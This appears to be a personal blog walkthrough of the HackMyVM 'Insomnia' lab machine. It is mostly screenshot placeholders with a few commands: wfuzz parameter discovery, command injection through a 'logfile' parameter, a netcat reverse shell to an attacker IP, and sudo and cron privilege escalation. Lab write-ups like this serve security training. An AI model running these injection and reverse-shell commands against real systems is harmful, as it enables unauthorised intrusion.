Windy's little blog-HackMyVm Insomnia Walkthrough (RCE)

HackMyVm Insomnia Walkthrough (RCE)2021-02-01 21:26:54

Machines can be download here.

Nmap scan ports.

图片.png

Gobuster scan files and folders.

图片.png

Visit main page, get chat window.

图片.png

Visit chat.txt, chat history is here.

图片.png

Visit administration.php, get error.

图片.png

There should be some parameter for administration.php.

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt   'http://192.168.56.56:8080/administration.php?FUZZ=test'

图片.png

Exclude 65ch length response.

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hh 65  'http://192.168.56.56:8080/administration.php?FUZZ=test'

图片.png

curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;id

Check chat.txt.

图片.png

There is RCE. Get reverse shell now.

curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;nc%20192.168.56.100%201234%20-e%20/bin/bash

图片.png

sudo -l

图片.png

cat /var/www/html/start.sh

图片.png

echo bash >/var/www/html/start.sh
sudo -u julia /bin/bash /var/www/html/start.sh

图片.png

Check crontab.

图片.png

Add reverse shell code into check.sh, and wait.

图片.png

四

五

六

日